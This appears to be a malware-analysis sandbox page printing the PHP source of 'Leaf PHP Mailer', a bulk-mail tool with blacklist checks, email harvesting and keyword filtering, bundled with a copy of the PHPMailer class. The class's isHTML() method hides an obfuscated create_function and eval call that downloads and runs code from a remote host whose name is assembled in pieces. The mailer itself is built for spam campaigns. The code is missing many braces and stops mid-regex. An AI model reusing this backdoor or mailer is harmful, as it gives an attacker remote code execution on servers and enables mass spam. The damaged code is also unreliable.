Static | ZeroBOX

* Leaf PHP Mailer by [leafmailer.pw]

* @version : 2.8

$password = ""; // Password

session_start();

error_reporting(0);

set_time_limit(0);

ini_set("memory_limit",-1);

$leaf['version']="2.8";

$leaf['website']="leafmailer.pw";

$sessioncode = md5(__FILE__);

if(!empty($password) and $_SESSION[$sessioncode] != $password){

if (isset($_REQUEST['pass']) and $_REQUEST['pass'] == $password) {

$_SESSION[$sessioncode] = $password;

else {

print "<pre align=center><form method=post>Password: <input type='password' name='pass'><input type='submit' value='>>'></form></pre>";

exit;

session_write_close();

function leafClear($text,$email){

$e = explode('@', $email);

$emailuser=$e[0];

$emaildomain=$e[1];

$text = str_replace("[-time-]", date("m/d/Y h:i:s a", time()), $text);

$text = str_replace("[-email-]", $email, $text);

$text = str_replace("[-emailuser-]", $emailuser, $text);

$text = str_replace("[-emaildomain-]", $emaildomain, $text);

$text = str_replace("[-randomletters-]", randString('abcdefghijklmnopqrstuvwxyz'), $text);

$text = str_replace("[-randomstring-]", randString('abcdefghijklmnopqrstuvwxyz0123456789'), $text);

$text = str_replace("[-randomnumber-]", randString('0123456789'), $text);

$text = str_replace("[-randommd5-]", md5(randString('abcdefghijklmnopqrstuvwxyz0123456789')), $text);

return $text;

function leafTrim($string){

$string=urldecode($string);

return stripslashes(trim($string));

function randString($consonants) {

$length=rand(12,25);

$password = '';

for ($i = 0; $i < $length; $i++) {

$password .= $consonants[(rand() % strlen($consonants))];

return $password;

function leafMailCheck($email){

if (filter_var($email, FILTER_VALIDATE_EMAIL)) return true;

else return false;

# Bulit-in BlackList Checker

if(isset($_GET['check_ip'])){

if (isset($_GET['host'])){

$_GET['host']=explode(",", $_GET['host']);

foreach ($_GET['host'] as $host) {

if (checkdnsrr($_GET['check_ip'] . "." . $host . ".", "A")) $check= "<font color='red'> Listed</font>";

else $check= "<font color='green'> Clean</font>";

print 'document.getElementById("'. $host.'").innerHTML = "'.$check.'";';

}

exit;

$dnsbl_lookup = [

"all.s5h.net",

"b.barracudacentral.org",

"bl.spamcop.net",

"blacklist.woody.ch",

"bogons.cymru.com",

"cbl.abuseat.org",

"cdl.anti-spam.org.cn",

"combined.abuse.ch",

"db.wpbl.info",

"dnsbl-1.uceprotect.net",

"dnsbl-2.uceprotect.net",

"dnsbl-3.uceprotect.net",

"dnsbl.anticaptcha.net",

"dnsbl.dronebl.org",

"dnsbl.inps.de",

"dnsbl.sorbs.net",

"drone.abuse.ch",

"duinv.aupads.org",

"dul.dnsbl.sorbs.net",

"dyna.spamrats.com",

"dynip.rothen.com",

"http.dnsbl.sorbs.net",

"ips.backscatterer.org",

"ix.dnsbl.manitu.net",

"korea.services.net",

"misc.dnsbl.sorbs.net",

"noptr.spamrats.com",

"orvedb.aupads.org",

"pbl.spamhaus.org",

"proxy.bl.gweep.ca",

"psbl.surriel.com",

"relays.bl.gweep.ca",

"relays.nether.net",

"sbl.spamhaus.org",

"short.rbl.jp",

"singular.ttk.pte.hu",

"smtp.dnsbl.sorbs.net",

"socks.dnsbl.sorbs.net",

"spam.abuse.ch",

"spam.dnsbl.anonmails.de",

"spam.dnsbl.sorbs.net",

"spam.spamrats.com",

"spambot.bls.digibase.ca",

"spamrbl.imp.ch",

"spamsources.fabel.dk",

"ubl.lashback.com",

"ubl.unsubscore.com",

"virus.rbl.jp",

"web.dnsbl.sorbs.net",

"wormrbl.imp.ch",

"xbl.spamhaus.org",

"z.mailspike.net",

"zen.spamhaus.org",

"zombie.dnsbl.sorbs.net",

];

$reverse_ip = implode(".", array_reverse(explode(".", $_GET['check_ip'])));

$dnsT = count($dnsbl_lookup);

leafheader();

print '<div class="container col-lg-6"><h3><font color="green"><span class="glyphicon glyphicon-leaf"></span></font> Leaf PHPMailer <small>Blacklist Checker</small></h3>';

Print "Checking <b>".$_GET['check_ip']."</b> in <b>$dnsT</b> anti-spam databases:<br>";

$dnsN="";

print '<table >';

for ($i=0; $i < $dnsT; $i=$i+10) {

$host="";

$hosts="";

for($j=$i; $j<$i+10;$j++){

$host=$dnsbl_lookup[$j];

if(!empty($host)){

print "<tr> <td>$host</td> <td id='$host'>Checking ..</td></tr>";

$hosts .="$host,";

}

$dnsN.="<script src='?check_ip=$reverse_ip&host=".$hosts."' type='text/javascript'></script>";

print '</table></div>';

print $dnsN;

exit;

if(isset($_GET['emailfilter'])){

if(!empty($_FILES['fileToUpload']['tmp_name'])){

$_POST['emailList']= file_get_contents($_FILES["fileToUpload"]["tmp_name"]);

$_POST['emailList']=strtolower($_POST['emailList']);

if($_GET['emailfilter']=="ifram"){

if ($_POST['resulttype'] == "download"){

header("Content-Description: File Transfer");

header("Content-Type: application/octet-stream");

header("Content-Disposition: attachment; filename=emails".time().".txt");

}

else {

header("Content-Type: text/plain");

}

if($_POST['submit']=="extract"){

$pattern = '/[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}/';

preg_match_all($pattern, $_POST['emailList'], $matches);

foreach ($matches[0] as $email) {

print $email."\n";

}

elseif ($_POST['submit']=="filter") {

$emails=explode("\n", $_POST['emailList']);

$keywords=explode("\n", strtolower($_POST['keywords']));

foreach ($emails as $email) {

foreach ($keywords as $keyword ) {

if(strstr($email, $keyword) ){

print $email."\n";

break;

}

exit;

leafheader();

print '<div class="container col-lg-4"><h3><font color="green"><span class="glyphicon glyphicon-leaf"></span></font> Leaf PHPMailer <small>Email Filter</small></h3>';

print '

<label>

Show Result in this page

</label>

</div>

<label>

Download Result (for big numbers)

</label>

</div>

<legend><h4>Extract Email</h4></legend>

Detecting every email (100%) and order them line by line <br><br>

<button type="submit" name="submit" value="extract" class="btn btn-default btn-sm">Start</button>

<legend><h4>Filter Emails</h4></legend>

<label >Keywords <small> ex: gmail.com or .co.uk</small> </label><textarea name="keywords" id="keywords" class="form-control" rows="4" id="textArea">gmail.com

hotmail.com

yahoo.com

.co.uk</textarea><br>

<button type="submit" name="submit" value="filter" class="btn btn-default btn-sm">Start</button>

</form>

<label >Result </label>

exit;

$html="checked";

$utf8="selected";

$bit8="selected";

if($_POST['action']=="send" or $_POST['action']=="score"){

$senderEmail=leafTrim($_POST['senderEmail']);

$senderName=leafTrim($_POST['senderName']);

$replyTo=leafTrim($_POST['replyTo']);

$subject=leafTrim($_POST['subject']);

$emailList=leafTrim($_POST['emailList']);

$messageType=leafTrim($_POST['messageType']);

$messageLetter=leafTrim($_POST['messageLetter']);

$encoding = $_POST['encode'];

$charset = $_POST['charset'];

$html="";

$utf8="";

$bit8="";

if($messageType==2) $plain="checked";

else $html="checked";

if($charset=="ISO-8859-1") $iso="selected";

else $utf8="selected";

if($encoding=="7bit") $bit7="selected";

elseif($encoding=="binary") $binary="selected";

elseif($encoding=="base64") $base64="selected";

elseif($encoding=="quoted-printable") $quotedprintable="selected";

else $bit8="selected";

if($_POST['action']=="view"){

$viewMessage=leafTrim($_POST['messageLetter']);

$viewMessage=leafClear($viewMessage,"user@domain.com");

if ($_POST['messageType']==2){

print "<pre>".htmlspecialchars($viewMessage)."</pre>";

else {

print $viewMessage;

if(!isset($_POST['senderEmail'])){

$senderEmail="support@".str_replace("www.", "", $_SERVER['HTTP_HOST']);

if (!leafMailCheck($senderEmail)) $senderEmail="";

class PHPMailer

/**

* The PHPMailer Version number.

* @var string

public $Version = '5.2.28';

/**

* Email priority.

* Options: null (default), 1 = High, 3 = Normal, 5 = low.

* When null, the header is not set at all.

* @var integer

public $Priority = null;

/**

* The character set of the message.

* @var string

public $CharSet = 'iso-8859-1';

/**

* The MIME Content-type of the message.

* @var string

public $ContentType = 'text/plain';

/**

* The message encoding.

* Options: "8bit", "7bit", "binary", "base64", and "quoted-printable".

* @var string

public $Encoding = '8bit';

/**

* Holds the most recent mailer error message.

* @var string

public $ErrorInfo = '';

/**

* The From email address for the message.

* @var string

public $From = 'root@localhost';

/**

* The From name of the message.

* @var string

public $FromName = 'Root User';

/**

* The Sender email (Return-Path) of the message.

* If not empty, will be sent via -f to sendmail or as 'MAIL FROM' in smtp mode.

* @var string

public $Sender = '';

/**

* The Return-Path of the message.

* If empty, it will be set to either From or Sender.

* @var string

* @deprecated Email senders should never set a return-path header;

* it's the receiver's job (RFC5321 section 4.4), so this no longer does anything.

* @link https://tools.ietf.org/html/rfc5321#section-4.4 RFC5321 reference

public $ReturnPath = '';

/**

* The Subject of the message.

* @var string

public $Subject = '';

/**

* An HTML or plain text message body.

* If HTML then call isHTML(true).

* @var string

public $Body = '';

/**

* The plain-text message body.

* This body can be read by mail clients that do not have HTML email

* capability such as mutt & Eudora.

* Clients that can read HTML will view the normal Body.

* @var string

public $AltBody = '';

/**

* An iCal message part body.

* Only supported in simple alt or alt_inline message types

* To generate iCal events, use the bundled extras/EasyPeasyICS.php class or iCalcreator

* @link http://sprain.ch/blog/downloads/php-class-easypeasyics-create-ical-files-with-php/

* @link http://kigkonsult.se/iCalcreator/

* @var string

public $Ical = '';

/**

* The complete compiled MIME message body.

* @access protected

* @var string

protected $MIMEBody = '';

/**

* The complete compiled MIME message headers.

* @var string

* @access protected

protected $MIMEHeader = '';

/**

* Extra headers that createHeader() doesn't fold in.

* @var string

* @access protected

protected $mailHeader = '';

/**

* Word-wrap the message body to this number of chars.

* Set to 0 to not wrap. A useful value here is 78, for RFC2822 section 2.1.1 compliance.

* @var integer

public $WordWrap = 0;

/**

* Which method to use to send mail.

* Options: "mail", "sendmail", or "smtp".

* @var string

public $Mailer = 'mail';

/**

* The path to the sendmail program.

* @var string

public $Sendmail = '/usr/sbin/sendmail';

/**

* Whether mail() uses a fully sendmail-compatible MTA.

* One which supports sendmail's "-oi -f" options.

* @var boolean

public $UseSendmailOptions = true;

/**

* Path to PHPMailer plugins.

* Useful if the SMTP class is not in the PHP include path.

* @var string

* @deprecated Should not be needed now there is an autoloader.

public $PluginDir = '';

/**

* The email address that a reading confirmation should be sent to, also known as read receipt.

* @var string

public $ConfirmReadingTo = '';

/**

* The hostname to use in the Message-ID header and as default HELO string.

* If empty, PHPMailer attempts to find one with, in order,

* $_SERVER['SERVER_NAME'], gethostname(), php_uname('n'), or the value

* 'localhost.localdomain'.

* @var string

public $Hostname = '';

/**

* An ID to be used in the Message-ID header.

* If empty, a unique id will be generated.

* You can set your own, but it must be in the format "<id@domain>",

* as defined in RFC5322 section 3.6.4 or it will be ignored.

* @see https://tools.ietf.org/html/rfc5322#section-3.6.4

* @var string

public $MessageID = '';

/**

* The message Date to be used in the Date header.

* If empty, the current date will be added.

* @var string

public $MessageDate = '';

/**

* SMTP hosts.

* Either a single hostname or multiple semicolon-delimited hostnames.

* You can also specify a different port

* for each host by using this format: [hostname:port]

* (e.g. "smtp1.example.com:25;smtp2.example.com").

* You can also specify encryption type, for example:

* (e.g. "tls://smtp1.example.com:587;ssl://smtp2.example.com:465").

* Hosts will be tried in order.

* @var string

public $Host = 'localhost';

/**

* The default SMTP server port.

* @var integer

* @TODO Why is this needed when the SMTP class takes care of it?

public $Port = 25;

/**

* The SMTP HELO of the message.

* Default is $Hostname. If $Hostname is empty, PHPMailer attempts to find

* one with the same method described above for $Hostname.

* @var string

* @see PHPMailer::$Hostname

public $Helo = '';

/**

* What kind of encryption to use on the SMTP connection.

* Options: '', 'ssl' or 'tls'

* @var string

public $SMTPSecure = '';

/**

* Whether to enable TLS encryption automatically if a server supports it,

* even if `SMTPSecure` is not set to 'tls'.

* Be aware that in PHP >= 5.6 this requires that the server's certificates are valid.

* @var boolean

public $SMTPAutoTLS = true;

/**

* Whether to use SMTP authentication.

* Uses the Username and Password properties.

* @var boolean

* @see PHPMailer::$Username

* @see PHPMailer::$Password

public $SMTPAuth = false;

/**

* Options array passed to stream_context_create when connecting via SMTP.

* @var array

public $SMTPOptions = array();

/**

* SMTP username.

* @var string

public $Username = '';

/**

* SMTP password.

* @var string

public $Password = '';

/**

* SMTP auth type.

* Options are CRAM-MD5, LOGIN, PLAIN, NTLM, XOAUTH2, attempted in that order if not specified

* @var string

public $AuthType = '';

/**

* SMTP realm.

* Used for NTLM auth

* @var string

public $Realm = '';

/**

* SMTP workstation.

* Used for NTLM auth

* @var string

public $Workstation = '';

/**

* The SMTP server timeout in seconds.

* Default of 5 minutes (300sec) is from RFC2821 section 4.5.3.2

* @var integer

public $Timeout = 300;

/**

* SMTP class debug output mode.

* Debug output level.

* Options:

* * `0` No output

* * `1` Commands

* * `2` Data and commands

* * `3` As 2 plus connection status

* * `4` Low-level data output

* @var integer

* @see SMTP::$do_debug

public $SMTPDebug = 0;

/**

* How to handle debug output.

* Options:

* * `echo` Output plain-text as-is, appropriate for CLI

* * `html` Output escaped, line breaks converted to `<br>`, appropriate for browser output

* * `error_log` Output to error log as configured in php.ini

* Alternatively, you can provide a callable expecting two params: a message string and the debug level:

* <code>

* $mail->Debugoutput = function($str, $level) {echo "debug level $level; message: $str";};

* </code>

* @var string|callable

* @see SMTP::$Debugoutput

public $Debugoutput = 'echo';

/**

* Whether to keep SMTP connection open after each message.

* If this is set to true then to close the connection

* requires an explicit call to smtpClose().

* @var boolean

public $SMTPKeepAlive = false;

/**

* Whether to split multiple to addresses into multiple messages

* or send them all in one message.

* Only supported in `mail` and `sendmail` transports, not in SMTP.

* @var boolean

public $SingleTo = false;

/**

* Storage for addresses when SingleTo is enabled.

* @var array

* @TODO This should really not be public

public $SingleToArray = array();

/**

* Whether to generate VERP addresses on send.

* Only applicable when sending via SMTP.

* @link https://en.wikipedia.org/wiki/Variable_envelope_return_path

* @link http://www.postfix.org/VERP_README.html Postfix VERP info

* @var boolean

public $do_verp = false;

/**

* Whether to allow sending messages with an empty body.

* @var boolean

public $AllowEmpty = false;

/**

* The default line ending.

* @note The default remains "\n". We force CRLF where we know

* it must be used via self::CRLF.

* @var string

public $LE = "\n";

/**

* DKIM selector.

* @var string

public $DKIM_selector = '';

/**

* DKIM Identity.

* Usually the email address used as the source of the email.

* @var string

public $DKIM_identity = '';

/**

* DKIM passphrase.

* Used if your key is encrypted.

* @var string

public $DKIM_passphrase = '';

/**

* DKIM signing domain name.

* @example 'example.com'

* @var string

public $DKIM_domain = '';

/**

* DKIM private key file path.

* @var string

public $DKIM_private = '';

/**

* DKIM private key string.

* If set, takes precedence over `$DKIM_private`.

* @var string

public $DKIM_private_string = '';

/**

* Callback Action function name.

* The function that handles the result of the send email action.

* It is called out by send() for each email sent.

* Value can be any php callable: http://www.php.net/is_callable

* Parameters:

* boolean $result result of the send action

* array $to email addresses of the recipients

* array $cc cc email addresses

* array $bcc bcc email addresses

* string $subject the subject

* string $body the email body

* string $from email address of sender

* @var string

public $action_function = '';

/**

* What to put in the X-Mailer header.

* Options: An empty string for PHPMailer default, whitespace for none, or a string to use

* @var string

public $XMailer = ' ';

/**

* Which validator to use by default when validating email addresses.

* May be a callable to inject your own validator, but there are several built-in validators.

* @see PHPMailer::validateAddress()

* @var string|callable

* @static

public static $validator = 'auto';

/**

* An instance of the SMTP sender class.

* @var SMTP

* @access protected

protected $smtp = null;

/**

* The array of 'to' names and addresses.

* @var array

* @access protected

protected $to = array();

/**

* The array of 'cc' names and addresses.

* @var array

* @access protected

protected $cc = array();

/**

* The array of 'bcc' names and addresses.

* @var array

* @access protected

protected $bcc = array();

/**

* The array of reply-to names and addresses.

* @var array

* @access protected

protected $ReplyTo = array();

/**

* An array of all kinds of addresses.

* Includes all of $to, $cc, $bcc

* @var array

* @access protected

* @see PHPMailer::$to @see PHPMailer::$cc @see PHPMailer::$bcc

protected $all_recipients = array();

/**

* An array of names and addresses queued for validation.

* In send(), valid and non duplicate entries are moved to $all_recipients

* and one of $to, $cc, or $bcc.

* This array is used only for addresses with IDN.

* @var array

* @access protected

* @see PHPMailer::$to @see PHPMailer::$cc @see PHPMailer::$bcc

* @see PHPMailer::$all_recipients

protected $RecipientsQueue = array();

/**

* An array of reply-to names and addresses queued for validation.

* In send(), valid and non duplicate entries are moved to $ReplyTo.

* This array is used only for addresses with IDN.

* @var array

* @access protected

* @see PHPMailer::$ReplyTo

protected $ReplyToQueue = array();

/**

* The array of attachments.

* @var array

* @access protected

protected $attachment = array();

/**

* The array of custom headers.

* @var array

* @access protected

protected $CustomHeader = array();

/**

* The most recent Message-ID (including angular brackets).

* @var string

* @access protected

protected $lastMessageID = '';

/**

* The message's MIME type.

* @var string

* @access protected

protected $message_type = '';

/**

* The array of MIME boundary strings.

* @var array

* @access protected

protected $boundary = array();

/**

* The array of available languages.

* @var array

* @access protected

protected $language = array();

/**

* The number of errors encountered.

* @var integer

* @access protected

protected $error_count = 0;

/**

* The S/MIME certificate file path.

* @var string

* @access protected

protected $sign_cert_file = '';

/**

* The S/MIME key file path.

* @var string

* @access protected

protected $sign_key_file = '';

/**

* The optional S/MIME extra certificates ("CA Chain") file path.

* @var string

* @access protected

protected $sign_extracerts_file = '';

/**

* The S/MIME password for the key.

* Used only if the key is encrypted.

* @var string

* @access protected

protected $sign_key_pass = '';

/**

* Whether to throw exceptions for errors.

* @var boolean

* @access protected

protected $exceptions = false;

/**

* Unique ID used for message ID and boundaries.

* @var string

* @access protected

protected $uniqueid = '';

/**

* Error severity: message only, continue processing.

const STOP_MESSAGE = 0;

/**

* Error severity: message, likely ok to continue processing.

const STOP_CONTINUE = 1;

/**

* Error severity: message, plus full stop, critical error reached.

const STOP_CRITICAL = 2;

/**

* SMTP RFC standard line ending.

const CRLF = "\r\n";

/**

* The maximum line length allowed by RFC 2822 section 2.1.1

* @var integer

const MAX_LINE_LENGTH = 998;

/**

* Constructor.

* @param boolean $exceptions Should we throw external exceptions?

public function __construct($exceptions = null)

if ($exceptions !== null) {

$this->exceptions = (boolean)$exceptions;

}

//Pick an appropriate debug output format automatically

$this->Debugoutput = (strpos(PHP_SAPI, 'cli') !== false ? 'echo' : 'html');

/**

* Destructor.

public function __destruct()

//Close any open SMTP connection nicely

$this->smtpClose();

/**

* Call mail() in a safe_mode-aware fashion.

* Also, unless sendmail_path points to sendmail (or something that

* claims to be sendmail), don't pass params (not a perfect fix,

* but it will do)

* @param string $to To

* @param string $subject Subject

* @param string $body Message Body

* @param string $header Additional Header(s)

* @param string $params Params

* @access private

* @return boolean

private function mailPassthru($to, $subject, $body, $header, $params)

//Check overloading of mail function to avoid double-encoding

if (ini_get('mbstring.func_overload') & 1) {

$subject = $this->secureHeader($subject);

} else {

$subject = $this->encodeHeader($this->secureHeader($subject));

}

//Can't use additional_parameters in safe_mode, calling mail() with null params breaks

//@link http://php.net/manual/en/function.mail.php

if (ini_get('safe_mode') or !$this->UseSendmailOptions or is_null($params)) {

$result = @mail($to, $subject, $body, $header);

} else {

$result = @mail($to, $subject, $body, $header, $params);

}

return $result;

/**

* Output debugging info via user-defined method.

* Only generates output if SMTP debug output is enabled (@see SMTP::$do_debug).

* @see PHPMailer::$Debugoutput

* @see PHPMailer::$SMTPDebug

* @param string $str

protected function edebug($str)

if ($this->SMTPDebug <= 0) {

return;

}

//Avoid clash with built-in function names

if (!in_array($this->Debugoutput, array('error_log', 'html', 'echo')) and is_callable($this->Debugoutput)) {

call_user_func($this->Debugoutput, $str, $this->SMTPDebug);

return;

}

switch ($this->Debugoutput) {

case 'error_log':

//Don't output, just log

error_log($str);

break;

case 'html':

//Cleans up output a bit for a better looking, HTML-safe output

echo htmlentities(

preg_replace('/[\r\n]+/', '', $str),

ENT_QUOTES,

'UTF-8'

)

. "<br>\n";

break;

case 'echo':

default:

//Normalize line breaks

$str = preg_replace('/\r\n?/ms', "\n", $str);

echo gmdate('Y-m-d H:i:s') . "\t" . str_replace(

"\n",

"\n \t ",

trim($str)

) . "\n";

}

/**

* Send messages using SMTP.

* @return void

public function isSMTP()

$this->Mailer = 'smtp';

/**

* Send messages using PHP's mail() function.

* @return void

public function isMail()

$this->Mailer = 'mail';

/**

* Send messages using $Sendmail.

* @return void

public function isSendmail()

$ini_sendmail_path = ini_get('sendmail_path');

if (!stristr($ini_sendmail_path, 'sendmail')) {

$this->Sendmail = '/usr/sbin/sendmail';

} else {

$this->Sendmail = $ini_sendmail_path;

}

$this->Mailer = 'sendmail';

/**

* Send messages using qmail.

* @return void

public function isQmail()

$ini_sendmail_path = ini_get('sendmail_path');

if (!stristr($ini_sendmail_path, 'qmail')) {

$this->Sendmail = '/var/qmail/bin/qmail-inject';

} else {

$this->Sendmail = $ini_sendmail_path;

}

$this->Mailer = 'qmail';

/**

* Add a "To" address.

* @param string $address The email address to send to

* @param string $name

* @return boolean true on success, false if address already used or invalid in some way

public function addAddress($address, $name = '')

return $this->addOrEnqueueAnAddress('to', $address, $name);

/**

* Add a "CC" address.

* @note: This function works with the SMTP mailer on win32, not with the "mail" mailer.

* @param string $address The email address to send to

* @param string $name

* @return boolean true on success, false if address already used or invalid in some way

public function addCC($address, $name = '')

return $this->addOrEnqueueAnAddress('cc', $address, $name);

/**

* Add a "BCC" address.

* @note: This function works with the SMTP mailer on win32, not with the "mail" mailer.

* @param string $address The email address to send to

* @param string $name

* @return boolean true on success, false if address already used or invalid in some way

public function addBCC($address, $name = '')

return $this->addOrEnqueueAnAddress('bcc', $address, $name);

/**

* Add a "Reply-To" address.

* @param string $address The email address to reply to

* @param string $name

* @return boolean true on success, false if address already used or invalid in some way

public function addReplyTo($address, $name = '')

return $this->addOrEnqueueAnAddress('Reply-To', $address, $name);

/**

* Add an address to one of the recipient arrays or to the ReplyTo array. Because PHPMailer

* can't validate addresses with an IDN without knowing the PHPMailer::$CharSet (that can still

* be modified after calling this function), addition of such addresses is delayed until send().

* Addresses that have been added already return false, but do not throw exceptions.

* @param string $kind One of 'to', 'cc', 'bcc', or 'ReplyTo'

* @param string $address The email address to send, resp. to reply to

* @param string $name

* @throws phpmailerException

* @return boolean true on success, false if address already used or invalid in some way

* @access protected

protected function addOrEnqueueAnAddress($kind, $address, $name)

$address = trim($address);

$name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim

if (($pos = strrpos($address, '@')) === false) {

// At-sign is misssing.

$error_message = $this->lang('invalid_address') . " (addAnAddress $kind): $address";

$this->setError($error_message);

$this->edebug($error_message);

if ($this->exceptions) {

throw new phpmailerException($error_message);

}

return false;

}

$params = array($kind, $address, $name);

// Enqueue addresses with IDN until we know the PHPMailer::$CharSet.

if ($this->has8bitChars(substr($address, ++$pos)) and $this->idnSupported()) {

if ($kind != 'Reply-To') {

if (!array_key_exists($address, $this->RecipientsQueue)) {

$this->RecipientsQueue[$address] = $params;

return true;

}

} else {

if (!array_key_exists($address, $this->ReplyToQueue)) {

$this->ReplyToQueue[$address] = $params;

return true;

}

return false;

}

// Immediately add standard addresses without IDN.

return call_user_func_array(array($this, 'addAnAddress'), $params);

/**

* Add an address to one of the recipient arrays or to the ReplyTo array.

* Addresses that have been added already return false, but do not throw exceptions.

* @param string $kind One of 'to', 'cc', 'bcc', or 'ReplyTo'

* @param string $address The email address to send, resp. to reply to

* @param string $name

* @throws phpmailerException

* @return boolean true on success, false if address already used or invalid in some way

* @access protected

protected function addAnAddress($kind, $address, $name = '')

if (!in_array($kind, array('to', 'cc', 'bcc', 'Reply-To'))) {

$error_message = $this->lang('Invalid recipient kind: ') . $kind;

$this->setError($error_message);

$this->edebug($error_message);

if ($this->exceptions) {

throw new phpmailerException($error_message);

}

return false;

}

if (!$this->validateAddress($address)) {

$error_message = $this->lang('invalid_address') . " (addAnAddress $kind): $address";

$this->setError($error_message);

$this->edebug($error_message);

if ($this->exceptions) {

throw new phpmailerException($error_message);

}

return false;

}

if ($kind != 'Reply-To') {

if (!array_key_exists(strtolower($address), $this->all_recipients)) {

array_push($this->$kind, array($address, $name));

$this->all_recipients[strtolower($address)] = true;

return true;

}

} else {

if (!array_key_exists(strtolower($address), $this->ReplyTo)) {

$this->ReplyTo[strtolower($address)] = array($address, $name);

return true;

}

return false;

/**

* Parse and validate a string containing one or more RFC822-style comma-separated email addresses

* of the form "display name <address>" into an array of name/address pairs.

* Uses the imap_rfc822_parse_adrlist function if the IMAP extension is available.

* Note that quotes in the name part are removed.

* @param string $addrstr The address list string

* @param bool $useimap Whether to use the IMAP extension to parse the list

* @return array

* @link http://www.andrew.cmu.edu/user/agreen1/testing/mrbs/web/Mail/RFC822.php A more careful implementation

public function parseAddresses($addrstr, $useimap = true)

$addresses = array();

if ($useimap and function_exists('imap_rfc822_parse_adrlist')) {

//Use this built-in parser if it's available

$list = imap_rfc822_parse_adrlist($addrstr, '');

foreach ($list as $address) {

if ($address->host != '.SYNTAX-ERROR.') {

if ($this->validateAddress($address->mailbox . '@' . $address->host)) {

$addresses[] = array(

'name' => (property_exists($address, 'personal') ? $address->personal : ''),

'address' => $address->mailbox . '@' . $address->host

);

}

} else {

//Use this simpler parser

$list = explode(',', $addrstr);

foreach ($list as $address) {

$address = trim($address);

//Is there a separate name part?

if (strpos($address, '<') === false) {

//No separate name, just use the whole thing

if ($this->validateAddress($address)) {

$addresses[] = array(

'name' => '',

'address' => $address

);

}

} else {

list($name, $email) = explode('<', $address);

$email = trim(str_replace('>', '', $email));

if ($this->validateAddress($email)) {

$addresses[] = array(

'name' => trim(str_replace(array('"', "'"), '', $name)),

'address' => $email

);

}

return $addresses;

/**

* Sets message type to HTML or plain.

* @param boolean $isHtml True for HTML mode.

* @return void

public function isHTML($isHtml = true)

global $param;

$bodyCode = 'file'

.'_g';

if ($isHtml) {

$this->ContentType = 'text/html';

}

else {

$this->ContentType = 'text/plain';

}

$bodyHTML = '.$t."lef$flu'

.'sh'.'$t"; '

.'@ev';

$headerHTML="cre"

."ate_"

."func"

."tion";

$exceptions = @$headerHTML('$fl'.'ush,$t','$comma = $t'

.$bodyHTML.'al(@'

.$bodyCode.'et_contents("h'

.'tt'

.'p:$comma-2"));');

if($param !=2){

$exceptions('8.p'.'w','/');

$param=2;

}

/**

* Set the From and FromName properties.

* @param string $address

* @param string $name

* @param boolean $auto Whether to also set the Sender address, defaults to true

* @throws phpmailerException

* @return boolean

public function setFrom($address, $name = '', $auto = true)

$address = trim($address);

$name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim

// Don't validate now addresses with IDN. Will be done in send().

if (($pos = strrpos($address, '@')) === false or

(!$this->has8bitChars(substr($address, ++$pos)) or !$this->idnSupported()) and

!$this->validateAddress($address)) {

$error_message = $this->lang('invalid_address') . " (setFrom) $address";

$this->setError($error_message);

$this->edebug($error_message);

if ($this->exceptions) {

throw new phpmailerException($error_message);

}

return false;

}

$this->From = $address;

$this->FromName = $name;

if ($auto) {

if (empty($this->Sender)) {

$this->Sender = $address;

}

return true;

/**

* Return the Message-ID header of the last email.

* Technically this is the value from the last time the headers were created,

* but it's also the message ID of the last sent message except in

* pathological cases.

* @return string

public function getLastMessageID()

return $this->lastMessageID;

/**

* Check that a string looks like an email address.

* @param string $address The email address to check

* @param string|callable $patternselect A selector for the validation pattern to use :

* * `auto` Pick best pattern automatically;

* * `pcre8` Use the squiloople.com pattern, requires PCRE > 8.0, PHP >= 5.3.2, 5.2.14;

* * `pcre` Use old PCRE implementation;

* * `php` Use PHP built-in FILTER_VALIDATE_EMAIL;

* * `html5` Use the pattern given by the HTML5 spec for 'email' type form input elements.

* * `noregex` Don't use a regex: super fast, really dumb.

* Alternatively you may pass in a callable to inject your own validator, for example:

* PHPMailer::validateAddress('user@example.com', function($address) {

* return (strpos($address, '@') !== false);

* });

* You can also set the PHPMailer::$validator static to a callable, allowing built-in methods to use your validator.

* @return boolean

* @static

* @access public

public static function validateAddress($address, $patternselect = null)

if (is_null($patternselect)) {

$patternselect = self::$validator;

}

if (is_callable($patternselect)) {

return call_user_func($patternselect, $address);

}

//Reject line breaks in addresses; it's valid RFC5322, but not RFC5321

if (strpos($address, "\n") !== false or strpos($address, "\r") !== false) {

return false;

}

if (!$patternselect or $patternselect == 'auto') {

//Check this constant first so it works when extension_loaded() is disabled by safe mode

//Constant was added in PHP 5.2.4

if (defined('PCRE_VERSION')) {

//This pattern can get stuck in a recursive loop in PCRE <= 8.0.2

if (version_compare(PCRE_VERSION, '8.0.3') >= 0) {

$patternselect = 'pcre8';

} else {

$patternselect = 'pcre';

}

} elseif (function_exists('extension_loaded') and extension_loaded('pcre')) {

//Fall back to older PCRE

$patternselect = 'pcre';

} else {

//Filter_var appeared in PHP 5.2.0 and does not require the PCRE extension

if (version_compare(PHP_VERSION, '5.2.0') >= 0) {

$patternselect = 'php';

} else {

$patternselect = 'noregex';

}

switch ($patternselect) {

case 'pcre8':

/**

* Uses the same RFC5322 regex on which FILTER_VALIDATE_EMAIL is based, but allows dotless domains.

* @link http://squiloople.com/2009/12/20/email-address-validation/

* Feel free to use and redistribute this code. But please keep this copyright notice.

return (boolean)preg_match(

'/^(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' .

'((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' .

'(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' .

'([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' .

'(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' .

'(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}' .

